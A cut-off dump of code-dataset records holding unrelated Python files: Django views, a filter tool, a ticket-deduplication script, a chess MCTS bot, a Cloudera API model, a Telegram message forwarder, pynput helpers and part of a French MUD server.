feedback about a faculty\"\"\"\n faculty = Faculty.objects.get(id=faculty_id)\n feedback = faculty.feedback_set.order_by('-date_added')\n context = {'faculty': faculty, 'feedback': feedback}\n return render(request, 'rmp_bd_app/faculty_details.html', context)\n\ndef new_university(request):\n \"\"\"Add a new University\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = UniversityForm()\n else:\n # POST data submitted; process date_added\n form = UniversityForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_university.html', context)\n\ndef new_department(request):\n \"\"\"Add a new Department\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = DepartmentForm()\n else:\n # POST data submitted; process date_added\n form = DepartmentForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_department.html', context)\n\ndef new_faculty(request):\n \"\"\"Add a new Faculty\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = FacultyForm()\n else:\n # POST data submitted; process date_added\n form = FacultyForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_faculty.html', context)\n\n\ndef new_feedback(request):\n \"\"\"Add a new Faculty\"\"\"\n if request.method != 'POST':\n # no data submitted, create a blank forms\n form = FeedbackForm()\n else:\n # POST data submitted; process date_added\n form = FeedbackForm(data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('rmp_bd_app:universities')\n\n # Display a blank or invalid form\n context = {'form': form}\n return render(request, 'rmp_bd_app/new_feedback.html', context)\n\n \n","sub_path":"rmp_bd_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"437816150","text":"from __future__ import unicode_literals\n\nr'''\necho az bz ay aaz bbz ayy aaaz bbbz ayyy // xstr //\nfilter -i:gm:a* -i:rm:.*z$ -x:len<3 -x:len>=4\n\naaz\n'''\n\n\ndef filter_(*args):\n def gtor(eval_here, g):\n from pypeline.yobj.str import Y_str\n from lib.peek import Peek\n argx = _argx(args)\n include, exclude = argx.include, argx.exclude\n\n run = not argx.expr_only\n\n if run:\n g = Peek(g)\n g0 = g[0]\n include = tuple(g0.tinypp(e, lambda_prefix=r'') for e in include)\n exclude = tuple(g0.tinypp(e, lambda_prefix=r'') for e in exclude)\n\n include, exclude = _chain(False, include), _chain(True, exclude)\n if include.__len__() == 0:\n include = r'True'\n if exclude.__len__() == 0:\n exclude = r'False'\n include = r'lambda y: (%s)' % include\n exclude = r'lambda y: (%s)' % exclude\n\n if run:\n include, exclude = map(eval_here.exec_here, (include, exclude))\n for y in g:\n if include(y) and not exclude(y):\n yield y\n else:\n yield Y_str(include)\n yield Y_str(exclude)\n\n return gtor\n\n\ndef _argx(args):\n from argparse import ArgumentParser\n\n class Argx(ArgumentParser):\n def __init__(self):\n super(Argx, self).__init__()\n _clude = dict(action=r'append', default=[])\n self.add_argument(r'-i', r'--include', **_clude)\n self.add_argument(r'-x', r'--exclude', **_clude)\n self.add_argument(r'-e', r'--expr-only', action=r'store_true')\n\n return Argx().parse_args(args)\n\n\ndef _chain(start_op, exprs):\n def chain_impl(current_op):\n expr_yielded = False\n for y in exprs:\n if y[:1] == r'-':\n current_op = not current_op\n if expr_yielded:\n yield current_op\n expr_yielded = False\n else:\n if expr_yielded:\n yield current_op\n yield y\n expr_yielded = True\n\n g = chain_impl(start_op)\n g = list(g)\n if 0 < g.__len__() and isinstance(g[-1], bool):\n g[-1:] = ()\n g = iter(g)\n\n def j(g):\n while True:\n try:\n yield next(g)\n b = next(g)\n except StopIteration:\n break\n yield (r'and', r'or')[b]\n\n g = j(g)\n j = r' '.join(g)\n return j\n","sub_path":"xpypeline/filter/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"201136678","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#from gensim import corpora\r\n#from collections import defaultdict\r\nfrom pprint import pprint\r\n##def openfile(filename):\r\n## fh = open(filename, \"r+\")\r\n## str = fh.read()\r\n## fh.close()\r\n## return str\r\ndef writetofile(filename,data):\r\n fw = open(filename, 'w')\r\n #for word,cnt in data:\r\n # fw.write(word + '\\t' + str(cnt)+ '\\\r\n fw.close()\r\n#def main(filename, topwords):\r\n## content = master\r\n## for sentence1 in master:\r\n## for sentence2 in content:\r\n## print(sentence1)\r\n## #print(content)\r\nwith open('nlp_ticket_input.txt') as f:\r\n content = f.readlines()\r\ndocuments = [x.strip() for x in content]\r\nstoplist = set('for a of the and to in job'.split())\r\ntexts = [[word for word in document.lower().split() if word not in stoplist]\r\n for document in documents]\r\n#pprint(texts[1])\r\ntexts_copy = texts\r\n#Remove Duplicates\r\nz = []\r\n#z = [[each_line for each_line in texts_copy if len(set(line).intersection(each_line)) == len(line)]\r\n# for line in texts]\r\n#pprint(texts)\r\n \r\n\r\n#output = [[line2 for line2 in line1 if line2 not in output]\r\n# for line1 in z]\r\nfor line in texts:\r\n counter = 0\r\n for each_line in texts_copy:\r\n if len(set(line).intersection(each_line)) == len(line):\r\n# print(line)\r\n z.append(line)\r\n# print(len(z))\r\nunique_list = []\r\n#unique list\r\nfor i in range(0,len(z)):\r\n if z[i] not in unique_list:\r\n unique_list.append(z[i])\r\ncumulative_count = 0\r\ncounter = []\r\n#Duplicate Counter\r\nfor item in unique_list:\r\n count = 0\r\n for items in texts:\r\n if len(set(item).intersection(items)) == len(item):\r\n count = count + 1\r\n counter.append(count)\r\n cumulative_count = count + cumulative_count\r\nprint(cumulative_count)\r\nif cumulative_count == len(texts):\r\n print(\"Counts Matched\")\r\nelse:\r\n print(\"No Match\")\r\nfor i in range(0,len(unique_list)):\r\n pprint(unique_list[i])\r\n print(\"Count: \", counter[i])\r\n","sub_path":"ticketanalyser/nlp_main.py","file_name":"nlp_main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365893828","text":"class Solution(object):\n def reverseBits(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n s = list(bin(n).replace('0b',''))\n s.reverse()\n s.extend(['0']*(32 - len(s)))\n return int(''.join(s),2)","sub_path":"190.py","file_name":"190.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391147235","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/30 10:43\n# @Author : Yajun Yin\n# @Note :\n\n\"\"\"\n可以和decorator中的timer对比\n\"\"\"\n\nimport threading\nimport random\nimport time\n\nTIMER = None\nFAILURE_CNT = 0\nALARM_INTERVAL = 15\n\n\ndef check_timer():\n global TIMER, FAILURE_CNT\n msg = None\n if FAILURE_CNT:\n msg = \"mission failed\"\n if msg:\n print(\"alarm:\", msg, FAILURE_CNT)\n FAILURE_CNT = 0\n TIMER = threading.Timer(ALARM_INTERVAL, check_timer)\n TIMER.start()\n\n\ndef task():\n time.sleep(3)\n if not random_error():\n print(\"task done\")\n else:\n print('task failed')\n\n\ndef random_error():\n global FAILURE_CNT\n s = random.randint(0, 10)\n if s >= 8:\n FAILURE_CNT += 1\n return True\n return False\n\n\nif __name__ == '__main__':\n TIMER = threading.Timer(1, check_timer)\n TIMER.start()\n while True:\n task()","sub_path":"Details-In-Python/concurrent/multi-thread/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"574662519","text":"import pygame\nfrom parameters import *\nimport game_process as gp\n\nclass Button:\n def __init__(self, width, height, color):\n self.width = width\n self.height = height\n self.color = color\n\n def draw(self, screen, x, y, action, *args, text=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if x < mouse[0] < x + self.width and y < mouse[1] < y + self.height:\n if click[0] and action is not None:\n action(*args)\n\n pygame.draw.rect(screen, self.color, (x, y, self.width, self.height))\n\n if text is not None:\n gp.print_text(screen, text, x, y)\n","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441124547","text":"# coding: utf-8\n\n\"\"\"\n Cloudera Manager API\n\n

Cloudera Manager API v33

Introduced in Cloudera Manager 6.3.0

Cloudera Product Documentation

\n\n OpenAPI spec version: 6.3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass ApiNameservice(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'active': 'ApiRoleRef',\n 'active_failover_controller': 'ApiRoleRef',\n 'stand_by': 'ApiRoleRef',\n 'stand_by_failover_controller': 'ApiRoleRef',\n 'secondary': 'ApiRoleRef',\n 'mount_points': 'list[str]',\n 'health_summary': 'ApiHealthSummary',\n 'health_checks': 'list[ApiHealthCheck]'\n }\n\n attribute_map = {\n 'name': 'name',\n 'active': 'active',\n 'active_failover_controller': 'activeFailoverController',\n 'stand_by': 'standBy',\n 'stand_by_failover_controller': 'standByFailoverController',\n 'secondary': 'secondary',\n 'mount_points': 'mountPoints',\n 'health_summary': 'healthSummary',\n 'health_checks': 'healthChecks'\n }\n\n def __init__(self, name=None, active=None, active_failover_controller=None, stand_by=None, stand_by_failover_controller=None, secondary=None, mount_points=None, health_summary=None, health_checks=None):\n \"\"\"\n ApiNameservice - a model defined in Swagger\n \"\"\"\n\n self._name = None\n self._active = None\n self._active_failover_controller = None\n self._stand_by = None\n self._stand_by_failover_controller = None\n self._secondary = None\n self._mount_points = None\n self._health_summary = None\n self._health_checks = None\n\n if name is not None:\n self.name = name\n if active is not None:\n self.active = active\n if active_failover_controller is not None:\n self.active_failover_controller = active_failover_controller\n if stand_by is not None:\n self.stand_by = stand_by\n if stand_by_failover_controller is not None:\n self.stand_by_failover_controller = stand_by_failover_controller\n if secondary is not None:\n self.secondary = secondary\n if mount_points is not None:\n self.mount_points = mount_points\n if health_summary is not None:\n self.health_summary = health_summary\n if health_checks is not None:\n self.health_checks = health_checks\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this ApiNameservice.\n Name of the nameservice.\n\n :return: The name of this ApiNameservice.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this ApiNameservice.\n Name of the nameservice.\n\n :param name: The name of this ApiNameservice.\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def active(self):\n \"\"\"\n Gets the active of this ApiNameservice.\n Reference to the active NameNode.\n\n :return: The active of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"\n Sets the active of this ApiNameservice.\n Reference to the active NameNode.\n\n :param active: The active of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._active = active\n\n @property\n def active_failover_controller(self):\n \"\"\"\n Gets the active_failover_controller of this ApiNameservice.\n Reference to the active NameNode's failover controller, if configured.\n\n :return: The active_failover_controller of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._active_failover_controller\n\n @active_failover_controller.setter\n def active_failover_controller(self, active_failover_controller):\n \"\"\"\n Sets the active_failover_controller of this ApiNameservice.\n Reference to the active NameNode's failover controller, if configured.\n\n :param active_failover_controller: The active_failover_controller of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._active_failover_controller = active_failover_controller\n\n @property\n def stand_by(self):\n \"\"\"\n Gets the stand_by of this ApiNameservice.\n Reference to the stand-by NameNode.\n\n :return: The stand_by of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._stand_by\n\n @stand_by.setter\n def stand_by(self, stand_by):\n \"\"\"\n Sets the stand_by of this ApiNameservice.\n Reference to the stand-by NameNode.\n\n :param stand_by: The stand_by of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._stand_by = stand_by\n\n @property\n def stand_by_failover_controller(self):\n \"\"\"\n Gets the stand_by_failover_controller of this ApiNameservice.\n Reference to the stand-by NameNode's failover controller, if configured.\n\n :return: The stand_by_failover_controller of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._stand_by_failover_controller\n\n @stand_by_failover_controller.setter\n def stand_by_failover_controller(self, stand_by_failover_controller):\n \"\"\"\n Sets the stand_by_failover_controller of this ApiNameservice.\n Reference to the stand-by NameNode's failover controller, if configured.\n\n :param stand_by_failover_controller: The stand_by_failover_controller of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._stand_by_failover_controller = stand_by_failover_controller\n\n @property\n def secondary(self):\n \"\"\"\n Gets the secondary of this ApiNameservice.\n Reference to the SecondaryNameNode.\n\n :return: The secondary of this ApiNameservice.\n :rtype: ApiRoleRef\n \"\"\"\n return self._secondary\n\n @secondary.setter\n def secondary(self, secondary):\n \"\"\"\n Sets the secondary of this ApiNameservice.\n Reference to the SecondaryNameNode.\n\n :param secondary: The secondary of this ApiNameservice.\n :type: ApiRoleRef\n \"\"\"\n\n self._secondary = secondary\n\n @property\n def mount_points(self):\n \"\"\"\n Gets the mount_points of this ApiNameservice.\n Mount points assigned to this nameservice in a federation.\n\n :return: The mount_points of this ApiNameservice.\n :rtype: list[str]\n \"\"\"\n return self._mount_points\n\n @mount_points.setter\n def mount_points(self, mount_points):\n \"\"\"\n Sets the mount_points of this ApiNameservice.\n Mount points assigned to this nameservice in a federation.\n\n :param mount_points: The mount_points of this ApiNameservice.\n :type: list[str]\n \"\"\"\n\n self._mount_points = mount_points\n\n @property\n def health_summary(self):\n \"\"\"\n Gets the health_summary of this ApiNameservice.\n Requires \\\"full\\\" view. The high-level health status of this nameservice.\n\n :return: The health_summary of this ApiNameservice.\n :rtype: ApiHealthSummary\n \"\"\"\n return self._health_summary\n\n @health_summary.setter\n def health_summary(self, health_summary):\n \"\"\"\n Sets the health_summary of this ApiNameservice.\n Requires \\\"full\\\" view. The high-level health status of this nameservice.\n\n :param health_summary: The health_summary of this ApiNameservice.\n :type: ApiHealthSummary\n \"\"\"\n\n self._health_summary = health_summary\n\n @property\n def health_checks(self):\n \"\"\"\n Gets the health_checks of this ApiNameservice.\n Requires \\\"full\\\" view. List of health checks performed on the nameservice.\n\n :return: The health_checks of this ApiNameservice.\n :rtype: list[ApiHealthCheck]\n \"\"\"\n return self._health_checks\n\n @health_checks.setter\n def health_checks(self, health_checks):\n \"\"\"\n Sets the health_checks of this ApiNameservice.\n Requires \\\"full\\\" view. List of health checks performed on the nameservice.\n\n :param health_checks: The health_checks of this ApiNameservice.\n :type: list[ApiHealthCheck]\n \"\"\"\n\n self._health_checks = health_checks\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, ApiNameservice):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","sub_path":"venv/lib/python3.7/site-packages/cm_client/models/api_nameservice.py","file_name":"api_nameservice.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10326837","text":"import flask\nfrom flask import request, jsonify\nfrom filelock import Timeout, FileLock\nimport time\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.debug = True\nimport threading\n\n@app.route('/', methods=['GET'])\ndef home():\n lock = threading.Lock()\n with lock:\n o = open(\"get_id.txt\", \"r\")\n print(o)\n line = o.readline()\n i = int(line)\n print(\"before=>\", i)\n i += 1\n o.close()\n\n file = open(\"get_id.txt\", \"w\")\n file.write(str(i))\n print(\"after=>\", i)\n file.close()\n return jsonify({\"given_id\": i})\n\n# A route to return all of the available entries in our catalog.\n@app.route('/reset', methods=['GET'])\ndef reset_all():\n lock = threading.Lock()\n with lock:\n i = 0\n file = open(\"get_id.txt\", \"w\")\n file.write(str(i))\n print(\"after=>\", i)\n file.close()\n return jsonify({\"given_id\": \"newly created \"})","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88288788","text":"import math\n\nimport chess\n\nfrom deepChess.Agent import Agent\nfrom deepChess.ChessUtils import position_evaluation_simple\nfrom deepChess.MCTreeSearchUtils import MCTSNode\nfrom deepChess.RandomAgent import RandomBot\n\n\ndef uct_score(parent_rollouts, child_rollouts, win_pct, temperature):\n exploration = math.sqrt(math.log(parent_rollouts) / child_rollouts)\n return win_pct + temperature * exploration\n\n\nclass MCTSBot(Agent):\n def __init__(self, num_rounds, temperature):\n Agent.__init__(self)\n self.num_rounds = num_rounds\n self.temperature = temperature\n\n def select_move(self, game_state):\n root = MCTSNode(game_state)\n\n for i in range(self.num_rounds):\n node = root\n while (not node.can_add_child()) and (not node.is_terminal()):\n node = self.select_child(node)\n\n # Add a new child node into the tree.\n if node.can_add_child():\n node = node.add_random_child()\n\n # Simulate a random game from this node.\n winner = self.simulate_random_game(node.game_state.copy())\n\n # Propagate scores back up the tree.\n while node is not None:\n node.record_win(winner)\n node = node.parent\n\n scored_moves = [\n (child.winning_frac(game_state.next_player()), child.move, child.num_rollouts)\n for child in root.children\n ]\n scored_moves.sort(key=lambda x: x[0], reverse=True)\n for s, m, n in scored_moves[:10]:\n print('%s - %.3f (%d)' % (m, s, n))\n\n # Having performed as many MCTS rounds as we have time for, we\n # now pick a move.\n best_move = None\n best_pct = -1.0\n for child in root.children:\n child_pct = child.winning_frac(game_state.next_player())\n if child_pct > best_pct:\n best_pct = child_pct\n best_move = child.move\n print('Select move %s with win pct %.3f' % (best_move, best_pct))\n return best_move\n\n def select_child(self, node):\n \"\"\"Select a child according to the upper confidence bound for\n trees (UCT) metric.\n \"\"\"\n total_rollouts = sum(child.num_rollouts for child in node.children)\n log_rollouts = math.log(total_rollouts)\n\n best_score = -1\n best_child = None\n # Loop over each child.\n for child in node.children:\n # Calculate the UCT score.\n win_percentage = child.winning_frac(node.game_state.next_player())\n exploration_factor = math.sqrt(log_rollouts / child.num_rollouts)\n uct_score = win_percentage + self.temperature * exploration_factor\n # Check if this is the largest we've seen so far.\n if uct_score > best_score:\n best_score = uct_score\n best_child = child\n return best_child\n\n @staticmethod\n def simulate_random_game(game):\n bots = {\n chess.WHITE: RandomBot(),\n chess.BLACK: RandomBot(),\n }\n while not game.done:\n eval = position_evaluation_simple(game.observation())\n if eval < -10:\n # print(\"white to move?\", game.white_to_move, \" game state:\", game.observation(), \"advantage:\", eval)\n game._resign()\n else:\n bot_move = bots[game.white_to_move].select_move(game)\n game = game.step(bot_move)\n # print(game.winner)\n return game.winner\n","sub_path":"old_code/deepChess/MCTSAgent.py","file_name":"MCTSAgent.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37045660","text":"# content of test_expectation.py\nimport pytest\nimport unittest\n\n\n@pytest.mark.parametrize(\n \"data, expected_mean\",\n [\n ([1, 2, 3, 4, 5], 3),\n ([-1, -2, -3, -4, -5], -3)\n ],\n)\ndef test_calculate_mean(data, expected_mean):\n sum = 0\n for d in data:\n sum += int(d)\n mean = sum / len(data)\n assert expected_mean == mean\n","sub_path":"parameterized/test_pytest_parametrize.py","file_name":"test_pytest_parametrize.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615874117","text":"import time\nfrom pynput.mouse import Button, Controller as m_Controller\nfrom pynput.keyboard import Key, Controller as k_Controller\n\n\ndef move_mouse(x: int, y: int) -> None:\n mouse = m_Controller()\n for i in range(1000):\n _x, _y = mouse.position\n move_x = 0\n move_y = 0\n if _x != x:\n if _x > x:\n move_x = -1\n else:\n move_x = 1\n if _y != y:\n if _y > y:\n move_y = -1\n else:\n move_y = 1\n mouse.move(move_x, move_y)\n time.sleep(0.005)\n\n\ndef loot() -> None:\n mouse = m_Controller()\n keyboard = k_Controller()\n with keyboard.pressed(Key.shift):\n mouse.click(Button.right)\n\n\ndef jump() -> None:\n keyboard = k_Controller()\n keyboard.press(Key.space)\n keyboard.release(Key.space)\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253474063","text":"import json\nimport os\n\nfrom telethon import TelegramClient, sync, events\nfrom telethon.tl.types import Channel\n\n# 1. Заходим на сайт https://my.telegram.org/apps\n# 2. Заполняем поля App title и Short name, нажимаем «Create application» и запоминаем две переменные: api_id и api_hash.\n\napi_id = os.environ['API_ID']\napi_hash = os.environ['API_HASH']\nsession = os.environ['SESSION']\ninputChannels = json.loads(os.environ['INPUT_CHANNELS'])\noutputChannels = json.loads(os.environ['OUTPUT_CHANNELS'])\n\nclient = TelegramClient(session, api_id, api_hash)\n\n@client.on(events.NewMessage(chats=inputChannels))\nasync def normal_handler(event):\n for channel in outputChannels:\n await client.send_message(channel, event.message)\n\nclient.start()\n\nchannels = []\nfor dialog in client.iter_dialogs():\n if isinstance(dialog.entity, Channel):\n channels.append(dialog.entity.title + ' - ' + str(dialog.entity.id))\n\nprint(channels)\n\nclient.run_until_disconnected()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31865664","text":"import time\nimport sqlite3\nimport random\n\n# import the MUD server class\nfrom mudserver import MudServer\nfrom lib.bd import *\nfrom lib.game import *\n\nconn = sqlite3.connect('cendrelune.db')\n\n# structure defining the rooms in the game. Try adding more rooms to the game!\nrooms = {\n \"Tavern\": {\n \"description\": \"You're in a cozy tavern warmed by an open fire.\",\n \"exits\": {\"outside\": \"Outside\"},\n },\n \"Outside\": {\n \"description\": \"You're standing outside a tavern. It's raining.\",\n \"exits\": {\"inside\": \"Tavern\"},\n }\n}\n\ntexte = []\n\n# liste des joueurs connectés\nplayers = {}\n\n# start the server\nmud = MudServer()\n\n# main game loop. We loop forever (i.e. until the program is terminated)\nwhile True:\n\n # pause for 1/5 of a second on each loop, so that we don't constantly\n # use 100% CPU time\n time.sleep(0.2)\n\n # 'update' must be called in the loop to keep the game running and give\n # us up-to-date information\n mud.update()\n\n # test d'event par interval\n #if random.randint(0, 10) > 8:\n # for pid, pl in players.items():\n # if players[pid]['connexion'] == 1:\n # mud.send_message(pid, \"\\nIl pleut...\")\n\n # go through any newly connected players\n for id in mud.get_new_players():\n\n # add the new player to the dictionary, noting that they've not been\n # named yet.\n # The dictionary key is the player's id number. We set their room to\n # None initially until they have entered a name\n # Try adding more player stats - level, gold, inventory, etc\n players[id] = {\n \"name\": None,\n \"password\": None,\n \"room\": None,\n \"connexion\": 0\n }\n\n # send the new player a prompt for their name\n txt(mud, id, \"\")\n txt(mud, id, ctxt(37, \"--- bienvenue ---\"))\n show_prompt(mud, id)\n\n # go through any recently disconnected players\n for id in mud.get_disconnected_players():\n\n # on verifie si le joueur est bien dans la liste des connectés\n # sinon on laisse tomber\n if id not in players:\n continue\n\n # on parse tous les joueurs connectés\n for pid, pl in players.items():\n if pid != id:\n # envoie d'un message a chacun, sauf au joueur qui quitte\n txt(mud, id, \"\")\n txt(mud, id, \"{} a quitte le jeu.\".format(players[id][\"name\"]))\n show_prompt(mud, id)\n\n # on enleve le joueur de la liste des connectés\n del(players[id])\n\n # go through any new commands sent from players\n for id, command, params in mud.get_commands():\n\n # if for any reason the player isn't in the player map, skip them and\n # move on to the next one\n if id not in players:\n continue\n\n # each of the possible commands is handled below. Try adding new\n # commands to the game!\n\n # 'create' command\n elif command == 'creer' and players[id][\"connexion\"] == 0:\n\n # creation d'un nouveau joueur\n #\n # on doit verifier si le compte existe deja en BD (= le nom existe deja)\n # s'il n'existe pas on le crée\n # sinon on refuse et on demande de changer le nom au joueur\n theParams = params.split()\n\n playerExist = player_exist(conn, theParams[0])\n\n if playerExist == 1:\n # ce nom existe deja dans la BD !\n txt(mud, id, \"\")\n txt(mud, id, \"Ce nom de joueur existe deja dans notre base !\")\n txt(mud, id, \"Merci d'en choisir un autre ou de vous connecter en tapant la commande :\")\n txt(mud, id, \"\\033[1mconnect \\033[0m \"+theParams[0]+\" \\n\")\n\n show_prompt(mud, id)\n else:\n # on crée le nouveau joueur\n player_add(conn, theParams)\n players[id][\"connexion\"] = 1\n\n # on l'enregistre dans la table temporaraire des joueurs en ligne\n players[id][\"name\"] = theParams[0]\n players[id][\"password\"] = theParams[1]\n\n # on lui affiche un message de bienvenue\n txt(mud, id, \"\")\n txt(mud, id, \"Nouveau commpte créé !\")\n txt(mud, id, \"Bienvenue, {}.\\n\".format(players[id][\"name\"]))\n\n show_prompt(mud, id)\n\n # on le place dans la zone de début du jeu\n # on lui affiche la description de la zone\n players[id][\"room\"] = \"Tavern\"\n #mud.send_message(id, get_zone_description(conn, \"Tavern\"))\n\n # on prévient les autres joueurs connectés qu'il vient d'arriver\n #for pid, pl in players.items():\n # if pid != id:\n # # send each player a message to tell them about the new player\n # mud.send_message(id, \"\")\n # mud.send_message(pid, \"\\033[23;2H\\033[31;1m{} vient de se connecter.\\033[0m\".format( players[id][\"name\"]))\n\n # show_prompt(mud, id)\n\n # 'aide' command\n elif command == \"m\" or command == \"M\":\n\n if not params:\n txt(mud, id, \"\")\n txt(mud, id, \"Menu:\")\n txt(mud, id, \"-------------------------------------------\")\n txt(mud, id, \"[s] Changer de station\")\n txt(mud, id, \"[v] Etat de la station\")\n txt(mud, id, \"[c] Constructions\")\n txt(mud, id, \"[r] Recherches\")\n txt(mud, id, \"[f] Flottes\")\n txt(mud, id, \"[n] Navires\")\n\n show_prompt(mud, id)\n\n # 'say' command\n elif command == \"dire\" and players[id][\"connexion\"] == 1:\n\n # go through every player in the game\n for pid, pl in players.items():\n # if they're in the same room as the player\n if players[pid][\"room\"] == players[id][\"room\"]:\n # send them a message telling them what the player said\n txt(mud, id, \"\")\n txt(mud, pid, \"{} dit: {}\".format(players[id][\"name\"], params))\n show_prompt(mud, id)\n\n # 'look' command\n elif command == \"regarder\" or command == 'reg':\n\n if players[id][\"connexion\"] == 1:\n # store the player's current room\n rm = rooms[players[id][\"room\"]]\n\n # send the player back the description of their current room\n txt(mud, id, \"\")\n txt(mud, id, get_zone_description(conn, players[id][\"room\"]))\n show_prompt(mud, id)\n\n playershere = []\n # go through every player in the game\n for pid, pl in players.items():\n # if they're in the same room as the player\n if players[pid][\"room\"] == players[id][\"room\"]:\n # ... and they have a name to be shown\n if players[pid][\"name\"] is not None:\n # add their name to the list\n playershere.append(players[pid][\"name\"])\n\n # send player a message containing the list of players in the room\n txt(mud, id, \"Joueurs presents: {}\".format(\", \".join(playershere)))\n\n # send player a message containing the list of exits from this room\n txt(mud, id, \"Sorties visibles: {}\".format(\", \".join(rm[\"exits\"])))\n\n # 'go' command\n elif command == \"go\" and players[id][\"connexion\"] == 1:\n\n # store the exit name\n ex = params.lower()\n\n # store the player's current room\n rm = rooms[players[id][\"room\"]]\n\n # if the specified exit is found in the room's exits list\n if ex in rm[\"exits\"]:\n\n # go through all the players in the game\n for pid, pl in players.items():\n # if player is in the same room and isn't the player\n # sending the command\n if players[pid][\"room\"] == players[id][\"room\"] and pid != id:\n # send them a message telling them that the player\n # left the room\n txt(mud, pid, \"{} left via exit '{}'\".format(players[id][\"name\"], ex))\n\n # update the player's current room to the one the exit leads to\n players[id][\"room\"] = rm[\"exits\"][ex]\n rm = rooms[players[id][\"room\"]]\n\n # go through all the players in the game\n for pid, pl in players.items():\n # if player is in the same (new) room and isn't the player\n # sending the command\n if players[pid][\"room\"] == players[id][\"room\"] and pid != id:\n # send them a message telling them that the player\n # entered the room\n txt(mud, pid, \"{} arrived via exit '{}'\".format(players[id][\"name\"], ex))\n\n # send the player a message telling them where they are now\n txt(mud, id, \"Vous arrivez a: '{}'\".format(players[id][\"room\"]))\n\n # the specified exit wasn't found in the current room\n else:\n # send back an 'unknown exit' message\n txt(mud, id, \"Sortie inconnue: '{}'\".format(ex))\n\n # some other, 